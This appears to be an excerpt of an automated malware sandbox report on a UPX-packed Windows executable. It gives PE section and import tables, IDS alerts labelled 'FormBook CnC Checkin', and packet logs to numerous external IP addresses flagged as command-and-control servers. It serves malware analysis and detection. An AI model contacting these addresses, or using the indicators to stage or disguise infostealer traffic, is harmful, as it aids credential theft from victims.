UPX0 | 0x1000 | 0xe6000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0xe7000 | 0x55000 | 0x54400 | 7df43ae634dee9bcf570475df45448ad | False | 0.9884029580860534 | data | 7.936028857120389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13c000 | 0x64000 | 0x63800 | 28c4b38d84976c7ff74a073ca63cb9e9 | False | 0.9494199513190955 | data | 7.94044284150493 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x13c5ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x13c6d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x13c804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x13c930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x13cc1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x13cd48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x13dbf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x13e4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x13ea0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x140fb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x142064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xca4f0 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xcaa84 | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xcb110 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xcb5a0 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xcbb9c | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xcc1f8 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xcc660 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x1424d0 | 0x5c95e | data | | | 1.0003322521952378
RT_GROUP_ICON | 0x19ee34 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x19eeb0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x19eec8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x19eee0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x19eef8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x19efd8 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | AddAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetSaveFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | socket
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-11T11:17:25.129349+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
2024-09-11T11:17:25.129349+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
2024-09-11T11:17:40.860929+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63317 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:44.027833+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63318 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:46.566841+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63319 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:49.106206+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63320 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:49.106206+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63320 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:55.140962+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63321 | 172.96.187.60 | 80 | TCP
2024-09-11T11:17:57.660795+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63322 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:00.220299+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63323 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:02.763625+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63324 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:02.763625+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63324 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:08.258289+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63325 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:11.092973+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63326 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:13.362343+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63327 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:15.905254+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63328 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:15.905254+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63328 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:22.311407+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63329 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:24.239922+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63330 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:26.797160+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63331 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:29.322120+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63332 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:29.322120+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63332 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:36.081007+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63333 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:38.649480+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63334 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:41.246867+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63335 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:43.806174+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63336 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:43.806174+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63336 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:49.314259+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63337 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:51.857060+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63338 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:54.378506+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63339 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:56.954242+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63340 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:56.954242+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63340 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:02.451571+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63341 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:05.018538+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63342 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:07.563352+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63343 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:10.107614+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63344 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:10.107614+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63344 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:15.625649+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63345 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:18.187779+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63346 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:20.725939+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63347 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:23.495580+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63348 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:23.495580+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63348 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:29.857744+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63349 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:32.000620+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63350 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:34.680405+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63351 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:37.159361+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63352 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:37.159361+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63352 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:43.318591+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63353 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:45.853997+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63354 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:48.378230+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63355 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:50.920421+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63356 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:50.920421+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63356 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:56.435701+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63357 | 188.114.97.3 | 80 | TCP
2024-09-11T11:19:58.982043+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63358 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:01.547658+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63359 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:04.080886+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63360 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:04.080886+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63360 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:10.230010+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63361 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:12.762486+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63362 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:15.332520+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63363 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:17.882453+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63364 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:17.882453+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63364 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:24.194165+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63365 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:27.186100+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63366 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:29.762687+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63367 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:32.268339+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63368 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:32.268339+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63368 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:38.047407+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63369 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:40.715590+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63370 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:43.199036+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63371 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:45.747099+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63372 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:45.747099+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63372 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:53.091857+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63373 | 38.181.141.122 | 80 | TCP
2024-09-11T11:20:55.058547+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63374 | 38.181.141.122 | 80 | TCP
2024-09-11T11:20:57.935818+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 63375 | 38.181.141.122 | 80 | TCP
2024-09-11T11:21:00.793822+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63376 | 38.181.141.122 | 80 | TCP
2024-09-11T11:21:00.793822+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63376 | 38.181.141.122 | 80 | TCP
2024-09-11T11:21:10.103459+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 63377 | 81.88.63.46 | 80 | TCP
2024-09-11T11:21:10.103459+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 63377 | 81.88.63.46 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2024 11:17:24.456057072 CEST | 49736 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:17:24.467027903 CEST | 80 | 49736 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:17:24.467154980 CEST | 49736 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:17:24.474478006 CEST | 49736 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:17:24.479285955 CEST | 80 | 49736 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:17:25.129198074 CEST | 80 | 49736 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:17:25.129210949 CEST | 80 | 49736 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:17:25.129348993 CEST | 49736 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:17:25.132328987 CEST | 49736 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:17:25.137223959 CEST | 80 | 49736 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:17:40.206856966 CEST | 63317 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:40.211844921 CEST | 80 | 63317 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:40.211930037 CEST | 63317 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:40.222723007 CEST | 63317 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:40.227763891 CEST | 80 | 63317 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:40.860830069 CEST | 80 | 63317 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:40.860852957 CEST | 80 | 63317 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:40.860929012 CEST | 63317 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:40.860934973 CEST | 80 | 63317 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:40.861013889 CEST | 63317 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:41.731251001 CEST | 63317 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:42.755686998 CEST | 63318 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:43.421040058 CEST | 80 | 63318 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:43.421181917 CEST | 63318 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:43.430991888 CEST | 63318 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:43.436101913 CEST | 80 | 63318 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:44.027640104 CEST | 80 | 63318 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:44.027697086 CEST | 80 | 63318 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:44.027832985 CEST | 63318 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:44.934312105 CEST | 63318 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:45.957532883 CEST | 63319 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:45.962534904 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.962699890 CEST | 63319 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:45.975841045 CEST | 63319 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:45.980866909 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.980942965 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.980972052 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.980999947 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.981026888 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.981079102 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.981106043 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.981159925 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:45.981188059 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:46.566657066 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:46.566706896 CEST | 80 | 63319 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:46.566840887 CEST | 63319 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:47.481226921 CEST | 63319 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:48.501033068 CEST | 63320 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:48.509215117 CEST | 80 | 63320 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:48.509366989 CEST | 63320 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:48.519026041 CEST | 63320 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:48.524990082 CEST | 80 | 63320 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:49.105931997 CEST | 80 | 63320 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:49.105952024 CEST | 80 | 63320 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:49.105966091 CEST | 80 | 63320 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:49.106205940 CEST | 63320 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:49.110240936 CEST | 63320 | 80 | 192.168.2.4 | 217.70.184.50
Sep 11, 2024 11:17:49.115226984 CEST | 80 | 63320 | 217.70.184.50 | 192.168.2.4
Sep 11, 2024 11:17:54.654225111 CEST | 63321 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:54.659187078 CEST | 80 | 63321 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:54.659290075 CEST | 63321 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:54.669792891 CEST | 63321 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:54.675076008 CEST | 80 | 63321 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:55.140651941 CEST | 80 | 63321 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:55.140686035 CEST | 80 | 63321 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:55.140961885 CEST | 63321 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:56.184351921 CEST | 63321 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:57.208417892 CEST | 63322 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:57.213310003 CEST | 80 | 63322 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:57.213392019 CEST | 63322 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:57.228420019 CEST | 63322 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:57.234143972 CEST | 80 | 63322 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:57.660542965 CEST | 80 | 63322 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:57.660615921 CEST | 80 | 63322 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:57.660794973 CEST | 63322 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:58.731468916 CEST | 63322 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:59.749600887 CEST | 63323 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:59.758765936 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.758852959 CEST | 63323 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:59.768162012 CEST | 63323 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:17:59.777004957 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.777066946 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.777096033 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.777141094 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.777172089 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.781611919 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.781640053 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.781699896 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:17:59.781728029 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:18:00.220200062 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:18:00.220246077 CEST | 80 | 63323 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:18:00.220299006 CEST | 63323 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:18:01.278832912 CEST | 63323 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:18:02.296561003 CEST | 63324 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:18:02.301757097 CEST | 80 | 63324 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:18:02.301877022 CEST | 63324 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:18:02.308949947 CEST | 63324 | 80 | 192.168.2.4 | 172.96.187.60
Sep 11, 2024 11:18:02.314166069 CEST | 80 | 63324 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:18:02.762028933 CEST | 80 | 63324 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:18:02.763535976 CEST | 80 | 63324 | 172.96.187.60 | 192.168.2.4
Sep 11, 2024 11:18:02.763624907 CEST | 63324 | 80 | 192.168.2.4 | 172.96.187.60
                                                      Sep 11, 2024 11:18:02.764791965 CEST6332480192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:02.769670963 CEST8063324172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:07.798162937 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:07.803044081 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:07.803194046 CEST6332580192.168.2.43.33.130.190
